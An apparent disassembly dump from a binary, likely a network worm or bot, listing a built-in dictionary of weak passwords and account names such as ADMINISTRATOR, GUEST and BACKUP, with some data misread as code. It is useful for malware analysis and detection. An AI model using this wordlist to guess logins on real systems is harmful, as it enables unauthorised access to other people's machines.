dd offset asc_42F61C ; "--"
dd offset asc_42F614 ; "----"
dd offset asc_42F610 ; "-+"
dd offset asc_42F608 ; "--++"
dd offset a0 ; "=-0"
dd offset a789_0 ; "789+"
dd offset a456_0 ; "456+"
dd offset asc_42F5F0 ; "$"
dd offset asc_42F5EC ; "$$"
dd offset asc_42F5E8 ; "$$$"
dd offset a@_5 ; "*&^%$#@!"
dd offset a@_4 ; "&^%$#@!"
dd offset a@_3 ; "^%$#@!"
dd offset a@_2 ; "%$#@!"
dd offset a@_1 ; "$#@!"
dd offset a@_0 ; "#@!"
dd offset a@ ; "@!"
dd offset dword_42645C
dd offset a00 ; "00"
dd offset a000 ; "000"
dd offset a0000 ; "0000"
dd offset a00000 ; "00000"
dd offset a000000 ; "000000"
dd offset a00000000 ; "00000000"
dd offset a000000000 ; "000000000"
dd offset a0000000000 ; "0000000000"
dd offset asc_426CEC ; "*"
dd offset asc_42F598 ; "**"
dd offset asc_42F594 ; "***"
dd offset asc_42F58C ; "****"
dd offset asc_42F584 ; "*****"
dd offset asc_42F57C ; "******"
dd offset asc_42F574 ; "*******"
dd offset asc_42F568 ; "********"
dd offset asc_42F55C ; "*********"
dd offset a001 ; "001"
dd offset a002 ; "002"
dd offset a003 ; "003"
dd offset a004 ; "004"
dd offset a005 ; "005"
dd offset a006 ; "006"
dd offset a007 ; "007"
dd offset a008 ; "008"
dd offset a009 ; "009"
dd offset a010 ; "010"
dd offset a0wn3d ; "0wn3d"
dd offset a0wned ; "0wned"
dd offset a1 ; "1"
dd offset a11 ; "11"
dd offset a111 ; "111"
dd offset a1111 ; "1111"
dd offset a11111 ; "11111"
dd offset a111111 ; "111111"
dd offset a1111111 ; "1111111"
dd offset a11111111 ; "11111111"
dd offset a111111111 ; "111111111"
dd offset a1111111111 ; "1111111111"
dd offset a2 ; "2"
dd offset a22 ; "22"
dd offset a222 ; "222"
dd offset a2222 ; "2222"
dd offset a22222 ; "22222"
dd offset a222222 ; "222222"
dd offset a2222222 ; "2222222"
dd offset a22222222 ; "22222222"
dd offset a222222222 ; "222222222"
dd offset a2222222222 ; "2222222222"
dd offset a3 ; "3"
dd offset a33 ; "33"
dd offset a333 ; "333"
dd offset a3333 ; "3333"
dd offset a33333 ; "33333"
dd offset a333333 ; "333333"
dd offset a3333333 ; "3333333"
dd offset a33333333 ; "33333333"
dd offset a333333333 ; "333333333"
dd offset a3333333333 ; "3333333333"
dd offset a4_0 ; "4"
dd offset a44 ; "44"
dd offset a444 ; "444"
dd offset a4444 ; "4444"
dd offset a44444 ; "44444"
dd offset a444444 ; "444444"
dd offset a4444444 ; "4444444"
dd offset a44444444 ; "44444444"
dd offset a444444444 ; "444444444"
dd offset a4444444444 ; "4444444444"
dd offset a5_0 ; "5"
dd offset a55 ; "55"
dd offset a555 ; "555"
dd offset a5555 ; "5555"
dd offset a55555 ; "55555"
dd offset a555555 ; "555555"
dd offset a5555555 ; "5555555"
dd offset a55555555 ; "55555555"
dd offset a555555555 ; "555555555"
dd offset a5555555555 ; "5555555555"
dd offset a6 ; "6"
dd offset a66 ; "66"
dd offset a666 ; "666"
dd offset a6666 ; "6666"
dd offset a66666 ; "66666"
dd offset a666666 ; "666666"
dd offset a6666666 ; "6666666"
dd offset a66666666 ; "66666666"
dd offset a666666666 ; "666666666"
dd offset a6666666666 ; "6666666666"
dd offset a7 ; "7"
dd offset a77 ; "77"
dd offset a777 ; "777"
dd offset a7777 ; "7777"
dd offset a77777 ; "77777"
dd offset a777777 ; "777777"
dd offset a7777777 ; "7777777"
dd offset a77777777 ; "77777777"
dd offset a777777777 ; "777777777"
dd offset a7777777777 ; "7777777777"
dd offset a8 ; "8"
dd offset a88 ; "88"
dd offset a888 ; "888"
dd offset a8888 ; "8888"
dd offset a88888 ; "88888"
dd offset a888888 ; "888888"
dd offset a8888888 ; "8888888"
dd offset a88888888 ; "88888888"
dd offset a888888888 ; "888888888"
dd offset a8888888888 ; "8888888888"
dd offset a9 ; "9"
dd offset a99 ; "99"
dd offset a999 ; "999"
dd offset a9999 ; "9999"
dd offset a99999 ; "99999"
dd offset a999999 ; "999999"
dd offset a9999999 ; "9999999"
dd offset a99999999 ; "99999999"
dd offset a999999999 ; "999999999"
dd offset a9999999999 ; "9999999999"
dd offset a110 ; "110"
dd offset a7410 ; "7410"
dd offset a0147 ; "0147"
dd offset a1122 ; "1122"
dd offset a456 ; "456"
dd offset a654 ; "654"
dd offset a789 ; "789"
dd offset a987 ; "987"
dd offset a8520 ; "8520"
dd offset a0258 ; "0258"
dd offset a1020 ; "1020"
dd offset a12 ; "12"
dd offset a121 ; "121"
dd offset a121212 ; "121212"
dd offset a123 ; "123"
dd offset a123123 ; "123123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a12346 ; "12346"
dd offset a123467 ; "123467"
dd offset a1234678 ; "1234678"
dd offset a12346789 ; "12346789"
dd offset a123467890 ; "123467890"
dd offset a1qwer ; "1qwer"
dd offset a1abc ; "1abc"
dd offset a1asd ; "1asd"
dd offset a1qwe ; "1qwe"
dd offset a12qwer ; "12qwer"
dd offset a12abc ; "12abc"
dd offset a12asd ; "12asd"
dd offset a12qwe ; "12qwe"
dd offset a123qwer ; "123qwer"
dd offset a123abc ; "123abc"
dd offset a123asd ; "123asd"
dd offset a123qwe ; "123qwe"
dd offset a1234qwer ; "1234qwer"
dd offset a1234abc ; "1234abc"
dd offset a1234asd ; "1234asd"
dd offset a1234qwe ; "1234qwe"
dd offset a1952 ; "1952"
dd offset a1953 ; "1953"
dd offset a1954 ; "1954"
dd offset a1955 ; "1955"
dd offset a1956 ; "1956"
dd offset a1957 ; "1957"
dd offset a1958 ; "1958"
dd offset a1959 ; "1959"
dd offset a1960 ; "1960"
dd offset a1961 ; "1961"
dd offset a1962 ; "1962"
dd offset a1963 ; "1963"
dd offset a1964 ; "1964"
dd offset a1965 ; "1965"
dd offset a1966 ; "1966"
dd offset a1967 ; "1967"
dd offset a1968 ; "1968"
dd offset a1969 ; "1969"
dd offset a1970 ; "1970"
dd offset a1971 ; "1971"
dd offset a1972 ; "1972"
dd offset a1973 ; "1973"
dd offset a1974 ; "1974"
dd offset a1975 ; "1975"
dd offset a1976 ; "1976"
dd offset a1977 ; "1977"
dd offset a1978 ; "1978"
dd offset a1979 ; "1979"
dd offset a1980 ; "1980"
dd offset a1981 ; "1981"
dd offset a1982 ; "1982"
dd offset a1983 ; "1983"
dd offset a1984 ; "1984"
dd offset a1985 ; "1985"
dd offset a1986 ; "1986"
dd offset a1987 ; "1987"
dd offset a1988 ; "1988"
dd offset a1989 ; "1989"
dd offset a1990 ; "1990"
dd offset a1991 ; "1991"
dd offset a1992 ; "1992"
dd offset a1993 ; "1993"
dd offset a1994 ; "1994"
dd offset a1995 ; "1995"
dd offset a1996 ; "1996"
dd offset a1997 ; "1997"
dd offset a1998 ; "1998"
dd offset a1999 ; "1999"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset a2005 ; "2005"
dd offset a2006 ; "2006"
dd offset a2600 ; "2600"
dd offset a321 ; "321"
dd offset a4321 ; "4321"
dd offset a54321 ; "54321"
dd offset a654321 ; "654321"
dd offset a7654321 ; "7654321"
dd offset aSony ; "sony"
dd offset aSamsung_0 ; "SAMSUNG"
dd offset aSamsung ; "samsung"
dd offset aSony_0 ; "SONY"
dd offset aMaster_0 ; "MASTER"
dd offset aMicrosoft ; "MICROSOFT"
dd offset aDisc_0 ; "DISC"
dd offset aCreative ; "CREATIVE"
dd offset aSex ; "SEX"
dd offset aNokia_0 ; "NOKIA"
dd offset aXp ; "XP"
dd offset aA_2 ; "a"
dd offset aAa ; "aa"
dd offset aAaa ; "aaa"
dd offset aAaaa ; "aaaa"
dd offset aAaaaa ; "aaaaa"
dd offset aAaaaaa ; "aaaaaa"
dd offset aAaaaaaa ; "aaaaaaa"
dd offset aAaaaaaaa ; "aaaaaaaa"
dd offset aAaaaaaaaa ; "aaaaaaaaa"
dd offset aPassword ; "Password"
dd offset aPassword1 ; "password1"
dd offset aQw ; "qw"
dd offset aQwe ; "qwe"
dd offset aQwer ; "qwer"
dd offset aQwert ; "qwert"
dd offset aQwerty ; "qwerty"
dd offset aQwertyu ; "qwertyu"
dd offset aQwertyui ; "qwertyui"
dd offset aQwertyuio ; "qwertyuio"
dd offset aQwertyuiop ; "qwertyuiop"
dd offset aRoot ; "root"
dd offset aServer_0 ; "server"
dd offset aService ; "service"
dd offset aServers ; "servers"
dd offset aServices ; "services"
dd offset aSystem ; "system"
dd offset aSystem_0 ; "SYSTEM"
dd offset aChi_0 ; "CHI"
dd offset aChi ; "chi"
dd offset aKor_0 ; "kor"
dd offset aTiger ; "tiger"
dd offset aKor ; "KOR"
dd offset aToyota ; "TOYOTA"
dd offset aToyota_0 ; "toyota"
dd offset asc_43362C ; "x"
dd offset aXx ; "xx"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxxxx ; "xxxxx"
dd offset aXxxxxx ; "xxxxxx"
dd offset aXxxxxxx ; "xxxxxxx"
dd offset aXxxxxxxx ; "xxxxxxxx"
dd offset aXxxxxxxxx ; "xxxxxxxxx"
dd offset aXyz ; "xyz"
dd offset aYaco ; "yaco"
dd offset aYang ; "yang"
dd offset aKonyang ; "konyang"
dd offset aZ_1 ; "z"
dd offset aZx ; "zx"
dd offset aZxc ; "zxc"
dd offset aZxcv ; "zxcv"
dd offset aZxcvb ; "zxcvb"
dd offset aZxcvbn ; "zxcvbn"
dd offset aZxcvbnm ; "zxcvbnm"
dd offset aAs ; "as"
dd offset aAsd ; "asd"
dd offset aAsdf ; "asdf"
dd offset aAsdfg ; "asdfg"
dd offset aAsdfgh ; "asdfgh"
dd offset aAsdfghj ; "asdfghj"
dd offset aAsdfghjk ; "asdfghjk"
dd offset aAsdfghjkl ; "asdfghjkl"
dd offset aQaz ; "qaz"
dd offset aWsx ; "wsx"
dd offset aEdc ; "edc"
dd offset aRfv ; "rfv"
dd offset aB_0 ; "b"
dd offset aBb ; "bb"
dd offset aBbb ; "bbb"
dd offset aBbbb ; "bbbb"
dd offset aBbbbb ; "bbbbb"
dd offset aBbbbbb ; "bbbbbb"
dd offset aBbbbbbb ; "bbbbbbb"
dd offset aBbbbbbbb ; "bbbbbbbb"
dd offset aBbbbbbbbb ; "bbbbbbbbb"
dd offset aC_1 ; "c"
dd offset aCc ; "cc"
dd offset aCcc ; "ccc"
dd offset aCccc_0 ; "cccc"
dd offset aCcccc ; "ccccc"
dd offset aCccccc ; "cccccc"
dd offset aCcccccc ; "ccccccc"
dd offset aCccccccc ; "cccccccc"
dd offset aCcccccccc ; "ccccccccc"
dd offset aD ; "d"
dd offset aDd_1 ; "dd"
dd offset aDdd ; "ddd"
dd offset aDddd ; "dddd"
dd offset aDdddd ; "ddddd"
dd offset aF ; "f"
dd offset aFf ; "ff"
dd offset aFff ; "fff"
dd offset aFfff ; "ffff"
dd offset aFffff ; "fffff"
dd offset aE ; "e"
dd offset aEe ; "ee"
dd offset aEee ; "eee"
dd offset aEeee ; "eeee"
dd offset aEeeee ; "eeeee"
dd offset aEeeeee ; "eeeeee"
dd offset aG ; "g"
dd offset aGg ; "gg"
dd offset aGgg ; "ggg"
dd offset aGggg ; "gggg"
dd offset aGgggg ; "ggggg"
dd offset aGggggg ; "gggggg"
dd offset asc_42EDD4 ; "h"
dd offset aHh ; "hh"
dd offset aHhh ; "hhh"
dd offset aHhhh ; "hhhh"
dd offset aHhhhh ; "hhhhh"
dd offset aHhhhhh ; "hhhhhh"
dd offset aI_1 ; "i"
dd offset aIi ; "ii"
dd offset aIii ; "iii"
dd offset aIiii ; "iiii"
dd offset aIiiii ; "iiiii"
dd offset aIiiiii ; "iiiiii"
dd offset aJ ; "j"
dd offset aJj ; "jj"
dd offset aJjj ; "jjj"
dd offset aJjjj ; "jjjj"
dd offset aJjjjj ; "jjjjj"
dd offset aJjjjjj ; "jjjjjj"
dd offset aK ; "k"
dd offset aKk ; "kk"
dd offset aKkk ; "kkk"
dd offset aKkkk ; "kkkk"
dd offset aKkkkk ; "kkkkk"
dd offset aKkkkkk ; "kkkkkk"
dd offset asc_42ED44 ; "l"
dd offset aLl ; "ll"
dd offset aLll ; "lll"
dd offset aLlll ; "llll"
dd offset aLllll ; "lllll"
dd offset aLlllll ; "llllll"
dd offset aM_0 ; "m"
dd offset aMm ; "mm"
dd offset aMmm ; "mmm"
dd offset aMmmm ; "mmmm"
dd offset aMmmmm ; "mmmmm"
dd offset aMmmmmm ; "mmmmmm"
dd offset aN_0 ; "n"
dd offset aNn ; "nn"
dd offset aNnn ; "nnn"
dd offset aNnnn ; "nnnn"
dd offset aNnnnn ; "nnnnn"
dd offset aNnnnnn ; "nnnnnn"
dd offset aO ; "o"
dd offset aOo ; "oo"
dd offset aOoo ; "ooo"
dd offset aOooo ; "oooo"
dd offset aOoooo ; "ooooo"
dd offset aOooooo ; "oooooo"
dd offset aP_1 ; "p"
dd offset aPp ; "pp"
dd offset aPpp ; "ppp"
dd offset aPppp ; "pppp"
dd offset aPpppp ; "ppppp"
dd offset aPppppp ; "pppppp"
dd offset aU_0 ; "u"
dd offset aUu ; "uu"
dd offset aUuu ; "uuu"
dd offset aUuuu ; "uuuu"
dd offset aUuuuu ; "uuuuu"
dd offset aUuuuuu ; "uuuuuu"
dd offset aS_4 ; "s"
dd offset aSs ; "ss"
dd offset aSss ; "sss"
dd offset aSsss ; "ssss"
dd offset aSssss ; "sssss"
dd offset aSsssss ; "ssssss"
dd offset aT ; "t"
dd offset aTt ; "tt"
dd offset aTtt ; "ttt"
dd offset aTttt ; "tttt"
dd offset aTtttt ; "ttttt"
dd offset aTttttt ; "tttttt"
dd offset aY ; "y"
dd offset aYy ; "yy"
dd offset aYyy ; "yyy"
dd offset aYyyy ; "yyyy"
dd offset aYyyyy ; "yyyyy"
dd offset aYyyyyy ; "yyyyyy"
dd offset aV ; "v"
; ---------------------------------------------------------------------------
cld
jmp short loc_42E941
; ---------------------------------------------------------------------------
align 10h
dd offset aVvv ; "vvv"
dd offset aVvvv ; "vvvv"
dd offset aVvvvv ; "vvvvv"
dd offset aVvvvvv ; "vvvvvv"
; ---------------------------------------------------------------------------
fsub st(3), st
inc edx
add al, bl
jmp short loc_42E959
; ---------------------------------------------------------------------------
align 4
movsb
test dword ptr [edx+0], offset aWwww ; "wwww"
enter 42EBh, 0
shr bl, 42h
add [ebx+ebp*8-1447FFBEh], bh
inc edx
add [ebx+ebp*8-1453FFBEh], dh
inc edx
add [ebx+ebp*8-1463FFBEh], ah
inc edx
add [eax], ch
loc_42E941: ; CODE XREF: .text:0042E8FD�j
db 36h
inc ebx
add [eax-6BFFBD15h], bl
jmp short loc_42E98D
; ---------------------------------------------------------------------------
align 4
dd offset aZzzz ; "zzzz"
dd offset aZzzzz ; "zzzzz"
dd offset aZzzzzz ; "zzzzzz"
db 74h
; ---------------------------------------------------------------------------
loc_42E959: ; CODE XREF: .text:0042E915�j
jmp short loc_42E99D
; ---------------------------------------------------------------------------
align 4
dd offset aZzxx ; "zzxx"
dd offset aAass ; "aass"
; ---------------------------------------------------------------------------
pop esp
jmp short loc_42E9A9
; ---------------------------------------------------------------------------
align 4
dd offset aZzzxxxccc ; "zzzxxxccc"
dd offset aAaasssddd ; "aaasssddd"
; ---------------------------------------------------------------------------
cmp bl, ch
inc edx
add [eax], dh
jmp short loc_42E9B9
; ---------------------------------------------------------------------------
align 4
sub bl, ch
inc edx
add [eax], ah
jmp short loc_42E9C1
; ---------------------------------------------------------------------------
align 10h
dd offset a1qaz ; "1qaz"
; ---------------------------------------------------------------------------
adc bl, ch
inc edx
add [eax], cl
jmp short loc_42E9CD
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_42E98D: ; CODE XREF: .text:0042E949�j
jmp short loc_42E9D1
; ---------------------------------------------------------------------------
align 10h
dd offset a3wsx ; "3wsx"
dd offset a112233 ; "112233"
dd offset aMnb ; "mnb"
db 0E4h
; ---------------------------------------------------------------------------
loc_42E99D: ; CODE XREF: .text:loc_42E959�j
jmp far ptr 42h:0EADC0042h
; ---------------------------------------------------------------------------
aam 0EAh
inc edx
add ah, cl
loc_42E9A9: ; CODE XREF: .text:0042E965�j
jmp far ptr 42h:0EAC40042h
; ---------------------------------------------------------------------------
dd offset a159357 ; "159357"
dd offset a951753 ; "951753"
; ---------------------------------------------------------------------------
lodsb
loc_42E9B9: ; CODE XREF: .text:0042E975�j
jmp far ptr 42h:0EAA40042h
; ---------------------------------------------------------------------------
push eax
loc_42E9C1: ; CODE XREF: .text:0042E97D�j
out dx, eax
inc edx
add [edx+ebp*8+36DC0042h], dl
inc ebx
add ah, cl
loc_42E9CD: ; CODE XREF: .text:0042E989�j
db 36h
inc ebx
; ---------------------------------------------------------------------------
db 0
db 44h
; ---------------------------------------------------------------------------
loc_42E9D1: ; CODE XREF: .text:loc_42E98D�j
pop ds
inc ebx
add [ebp+ebp-1573FFBDh], ch
inc edx
add [eax-1BFFBCCDh], bh
db 65h
inc edx
add [edx+ebp*8-1587FFBEh], al
inc edx
add [eax-16h], dh
inc edx
add [ebx+esi+43h], bh
add [eax+33h], dl
inc ebx
add [esp+esi], bh
inc ebx
add [eax-16h], ch
inc edx
add [esp+esi+43h], dh
add al, al
xor eax, [ebx+0]
inc esp
xor al, 43h
add [eax-16h], ah
inc edx
add [eax-16h], bl
inc edx
add ah, bl
xor eax, [ebx+0]
push esp
and eax, [ebx+0]
push eax
jmp far ptr 42h:0EA480042h
; ---------------------------------------------------------------------------
dd offset aUser_0 ; "USER"
dd offset aBackup_0 ; "BACKUP"
dd offset aSystem_0 ; "SYSTEM"
dd offset aServer_1 ; "SERVER"
dd offset byte_43B658
dd 0
dword_42EA3C dd 10h ; sub_40CD3A+B03�r ...
aBackup_0 db 'BACKUP',0 ; DATA XREF: .text:0042EA28�o
align 4
aAccess_0 db 'ACCESS',0
align 10h
aTest_0 db 'TEST',0
align 4
aOwner_1 db 'OWNER',0
align 10h
aDemo_0 db 'DEMO',0
align 4
aLadeda db 'ladeda',0
align 10h
aTemp db 'TEMP',0
align 4
aPassword_0 db 'PASSWORD',0
align 4
aAdmin_1 db 'ADMIN',0
align 4
aGuest_1 db 'GUEST',0
align 4
aAdministrato_1 db 'ADMINISTRATOR',0
align 4
a142536 db '142536',0
align 4
a753951 db '753951',0
align 4
a951753 db '951753',0 ; DATA XREF: .text:0042E9B4�o
align 4
a159357 db '159357',0 ; DATA XREF: .text:0042E9B0�o
align 4
a753159 db '753159',0
align 4
a13579 db '13579',0
align 4
a2684 db '2684',0
align 4
a2486 db '2486',0
align 4
aMnbv db 'mnbv',0
align 4
aMnb db 'mnb',0 ; DATA XREF: .text:0042E998�o
a112233 db '112233',0 ; DATA XREF: .text:0042E994�o
align 4
a3wsx db '3wsx',0 ; DATA XREF: .text:0042E990�o
align 10h
a3edc db '3edc',0
align 4
a2qaz db '2qaz',0
align 10h
a2wsx db '2wsx',0
align 4
a1qaz db '1qaz',0 ; DATA XREF: .text:0042E980�o
align 10h
aZzxxcc db 'zzxxcc',0
align 4
aAassdd db 'aassdd',0
align 10h
aQqwwee db 'qqwwee',0
align 4
aQqqwwweee db 'qqqwwweee',0
align 4
aAaasssddd db 'aaasssddd',0 ; DATA XREF: .text:0042E96C�o
align 10h
aZzzxxxccc db 'zzzxxxccc',0 ; DATA XREF: .text:0042E968�o
align 4
aQqww db 'qqww',0
align 4
aAass db 'aass',0 ; DATA XREF: .text:0042E960�o
align 4
aZzxx db 'zzxx',0 ; DATA XREF: .text:0042E95C�o
align 4
aXxyyzz db 'xxyyzz',0
align 4
aZzzzzz db 'zzzzzz',0 ; DATA XREF: .text:0042E954�o
align 4
aZzzzz db 'zzzzz',0 ; DATA XREF: .text:0042E950�o
align 4
aZzzz db 'zzzz',0 ; DATA XREF: .text:0042E94C�o
align 4
aZzz db 'zzz',0
aZz db 'zz',0
align 4
aQqqqqq db 'qqqqqq',0
align 4
aQqqqq db 'qqqqq',0
align 4
aQqqq db 'qqqq',0
align 4
aQqq db 'qqq',0
aQq db 'qq',0
align 4
aQ:
unicode 0, <q>,0
aWwwwww db 'wwwwww',0
align 4
aWwwww db 'wwwww',0
align 10h
aWwww db 'wwww',0 ; DATA XREF: .text:0042E919�o
align 4
aWw db 'ww',0
align 4
aW:
unicode 0, <w>,0
aVvvvvv db 'vvvvvv',0 ; DATA XREF: .text:0042E90C�o
align 4
aVvvvv db 'vvvvv',0 ; DATA XREF: .text:0042E908�o
align 10h
aVvvv db 'vvvv',0 ; DATA XREF: .text:0042E904�o
align 4
aVvv db 'vvv',0 ; DATA XREF: sub_40CD3A+25AA�o
; .text:0042E900�o
aVv db 'vv',0
align 10h
aV: ; DATA XREF: .text:0042E8F8�o
unicode 0, <v>,0
aYyyyyy db 'yyyyyy',0 ; DATA XREF: .text:0042E8F4�o
align 4
aYyyyy db 'yyyyy',0 ; DATA XREF: .text:0042E8F0�o
align 4
aYyyy db 'yyyy',0 ; DATA XREF: .text:0042E8EC�o
align 4
aYyy db 'yyy',0 ; DATA XREF: .text:0042E8E8�o
aYy db 'yy',0 ; DATA XREF: .text:0042E8E4�o
align 4
aY: ; DATA XREF: .text:0042E8E0�o
unicode 0, <y>,0
aTttttt db 'tttttt',0 ; DATA XREF: .text:0042E8DC�o
align 10h
aTtttt db 'ttttt',0 ; DATA XREF: .text:0042E8D8�o
align 4
aTttt db 'tttt',0 ; DATA XREF: .text:0042E8D4�o
align 10h
aTtt db 'ttt',0 ; DATA XREF: .text:0042E8D0�o
aTt db 'tt',0 ; DATA XREF: .text:0042E8CC�o
align 4
aT: ; DATA XREF: .text:0042E8C8�o
unicode 0, <t>,0
aSsssss db 'ssssss',0 ; DATA XREF: .text:0042E8C4�o
align 4
aSssss db 'sssss',0 ; DATA XREF: .text:0042E8C0�o
align 4
aSsss db 'ssss',0 ; DATA XREF: .text:0042E8BC�o
align 4
aSss db 'sss',0 ; DATA XREF: .text:0042E8B8�o
aSs db 'ss',0 ; DATA XREF: .text:0042E8B4�o
align 4
aS_4: ; DATA XREF: .text:0042E8B0�o
unicode 0, <s>,0
aUuuuuu db 'uuuuuu',0 ; DATA XREF: .text:0042E8AC�o
align 4
aUuuuu db 'uuuuu',0 ; DATA XREF: .text:0042E8A8�o
align 10h
aUuuu db 'uuuu',0 ; DATA XREF: .text:0042E8A4�o
align 4
aUuu db 'uuu',0 ; DATA XREF: .text:0042E8A0�o
aUu db 'uu',0 ; DATA XREF: .text:0042E89C�o
align 10h
aU_0: ; DATA XREF: .text:0042E898�o
unicode 0, <u>,0
aPppppp db 'pppppp',0 ; DATA XREF: .text:0042E894�o
align 4
aPpppp db 'ppppp',0 ; DATA XREF: .text:0042E890�o
align 4
aPppp db 'pppp',0 ; DATA XREF: .text:0042E88C�o
align 4
aPpp db 'ppp',0 ; DATA XREF: .text:0042E888�o
aPp db 'pp',0 ; DATA XREF: .text:0042E884�o
align 4
aP_1: ; DATA XREF: .text:0042E880�o
unicode 0, <p>,0
aOooooo db 'oooooo',0 ; DATA XREF: .text:0042E87C�o
align 10h
aOoooo db 'ooooo',0 ; DATA XREF: .text:0042E878�o
align 4
aOooo db 'oooo',0 ; DATA XREF: .text:0042E874�o
align 10h
aOoo db 'ooo',0 ; DATA XREF: .text:0042E870�o
aOo db 'oo',0 ; DATA XREF: .text:0042E86C�o
align 4
aO: ; DATA XREF: .text:0042E868�o
unicode 0, <o>,0
aNnnnnn db 'nnnnnn',0 ; DATA XREF: .text:0042E864�o
align 4
aNnnnn db 'nnnnn',0 ; DATA XREF: .text:0042E860�o
align 4
aNnnn db 'nnnn',0 ; DATA XREF: .text:0042E85C�o
align 4
aNnn db 'nnn',0 ; DATA XREF: .text:0042E858�o
aNn db 'nn',0 ; DATA XREF: .text:0042E854�o
align 4
aN_0: ; DATA XREF: .text:0042E850�o
unicode 0, <n>,0
aMmmmmm db 'mmmmmm',0 ; DATA XREF: .text:0042E84C�o
align 4
aMmmmm db 'mmmmm',0 ; DATA XREF: .text:0042E848�o
align 10h
aMmmm db 'mmmm',0 ; DATA XREF: .text:0042E844�o
align 4
aMmm db 'mmm',0 ; DATA XREF: .text:0042E840�o
aMm db 'mm',0 ; DATA XREF: .text:0042E83C�o
align 10h
aM_0: ; DATA XREF: .text:0042E838�o
unicode 0, <m>,0
aLlllll db 'llllll',0 ; DATA XREF: .text:0042E834�o
align 4
aLllll db 'lllll',0 ; DATA XREF: .text:0042E830�o
align 4
aLlll db 'llll',0 ; DATA XREF: .text:0042E82C�o
align 4
aLll db 'lll',0 ; DATA XREF: .text:0042E828�o
aLl db 'll',0 ; DATA XREF: .text:0042E824�o
align 4
asc_42ED44: ; DATA XREF: .text:0042E820�o
unicode 0, <l>,0
aKkkkkk db 'kkkkkk',0 ; DATA XREF: .text:0042E81C�o
align 10h
aKkkkk db 'kkkkk',0 ; DATA XREF: .text:0042E818�o
align 4
aKkkk db 'kkkk',0 ; DATA XREF: .text:0042E814�o
align 10h
aKkk db 'kkk',0 ; DATA XREF: .text:0042E810�o
aKk db 'kk',0 ; DATA XREF: .text:0042E80C�o
align 4
aK: ; DATA XREF: .text:0042E808�o
unicode 0, <k>,0
aJjjjjj db 'jjjjjj',0 ; DATA XREF: .text:0042E804�o
align 4
aJjjjj db 'jjjjj',0 ; DATA XREF: .text:0042E800�o
align 4
aJjjj db 'jjjj',0 ; DATA XREF: .text:0042E7FC�o
align 4
aJjj db 'jjj',0 ; DATA XREF: .text:0042E7F8�o
aJj db 'jj',0 ; DATA XREF: .text:0042E7F4�o
align 4
aJ: ; DATA XREF: .text:0042E7F0�o
unicode 0, <j>,0
aIiiiii db 'iiiiii',0 ; DATA XREF: .text:0042E7EC�o
align 4
aIiiii db 'iiiii',0 ; DATA XREF: .text:0042E7E8�o
align 10h
aIiii db 'iiii',0 ; DATA XREF: .text:0042E7E4�o
align 4
aIii db 'iii',0 ; DATA XREF: .text:0042E7E0�o
aIi db 'ii',0 ; DATA XREF: .text:0042E7DC�o
align 10h
aI_1: ; DATA XREF: .text:0042E7D8�o
unicode 0, <i>,0
aHhhhhh db 'hhhhhh',0 ; DATA XREF: .text:0042E7D4�o
align 4
aHhhhh db 'hhhhh',0 ; DATA XREF: .text:0042E7D0�o
align 4
aHhhh db 'hhhh',0 ; DATA XREF: .text:0042E7CC�o
align 4
aHhh db 'hhh',0 ; DATA XREF: .text:0042E7C8�o
aHh db 'hh',0 ; DATA XREF: .text:0042E7C4�o
align 4
asc_42EDD4: ; DATA XREF: .text:0042E7C0�o
unicode 0, <h>,0
aGggggg db 'gggggg',0 ; DATA XREF: .text:0042E7BC�o
align 10h
aGgggg db 'ggggg',0 ; DATA XREF: .text:0042E7B8�o
align 4
aGggg db 'gggg',0 ; DATA XREF: .text:0042E7B4�o
align 10h
aGgg db 'ggg',0 ; DATA XREF: .text:0042E7B0�o
aGg db 'gg',0 ; DATA XREF: .text:0042E7AC�o
align 4
aG: ; DATA XREF: .text:0042E7A8�o
unicode 0, <g>,0
aEeeeee db 'eeeeee',0 ; DATA XREF: .text:0042E7A4�o
align 4
aEeeee db 'eeeee',0 ; DATA XREF: .text:0042E7A0�o
align 4
aEeee db 'eeee',0 ; DATA XREF: .text:0042E79C�o
align 4
aEee db 'eee',0 ; DATA XREF: .text:0042E798�o
aEe db 'ee',0 ; DATA XREF: .text:0042E794�o
align 4
aE: ; DATA XREF: .text:0042E790�o
unicode 0, <e>,0
aFffff db 'fffff',0 ; DATA XREF: .text:0042E78C�o
align 4
aFfff db 'ffff',0 ; DATA XREF: .text:0042E788�o
align 10h
aFff db 'fff',0 ; DATA XREF: .text:0042E784�o
aFf db 'ff',0 ; DATA XREF: .text:0042E780�o
align 4
aF: ; DATA XREF: .text:0042E77C�o
unicode 0, <f>,0
aDdddd db 'ddddd',0 ; DATA XREF: .text:0042E778�o
align 4
aDddd db 'dddd',0 ; DATA XREF: .text:0042E774�o
align 4
aDdd db 'ddd',0 ; DATA XREF: .text:0042E770�o
aDd_1 db 'dd',0 ; DATA XREF: .text:0042E76C�o
align 4
aD: ; DATA XREF: .text:0042E768�o
unicode 0, <d>,0
aCcccccccc db 'ccccccccc',0 ; DATA XREF: .text:0042E764�o
align 4
aCccccccc db 'cccccccc',0 ; DATA XREF: .text:0042E760�o
align 10h
aCcccccc db 'ccccccc',0 ; DATA XREF: .text:0042E75C�o
aCccccc db 'cccccc',0 ; DATA XREF: .text:0042E758�o
align 10h
aCcccc db 'ccccc',0 ; DATA XREF: .text:0042E754�o
align 4
aCccc_0 db 'cccc',0 ; DATA XREF: .text:0042E750�o
align 10h
aCcc db 'ccc',0 ; DATA XREF: .text:0042E74C�o
aCc db 'cc',0 ; DATA XREF: .text:0042E748�o
align 4
aC_1: ; DATA XREF: .text:0042E744�o
unicode 0, <c>,0
aBbbbbbbbb db 'bbbbbbbbb',0 ; DATA XREF: .text:0042E740�o
align 4
aBbbbbbbb db 'bbbbbbbb',0 ; DATA XREF: .text:0042E73C�o
align 4
aBbbbbbb db 'bbbbbbb',0 ; DATA XREF: .text:0042E738�o
aBbbbbb db 'bbbbbb',0 ; DATA XREF: .text:0042E734�o
align 4
aBbbbb db 'bbbbb',0 ; DATA XREF: .text:0042E730�o
align 4
aBbbb db 'bbbb',0 ; DATA XREF: .text:0042E72C�o
align 4
aBbb db 'bbb',0 ; DATA XREF: .text:0042E728�o
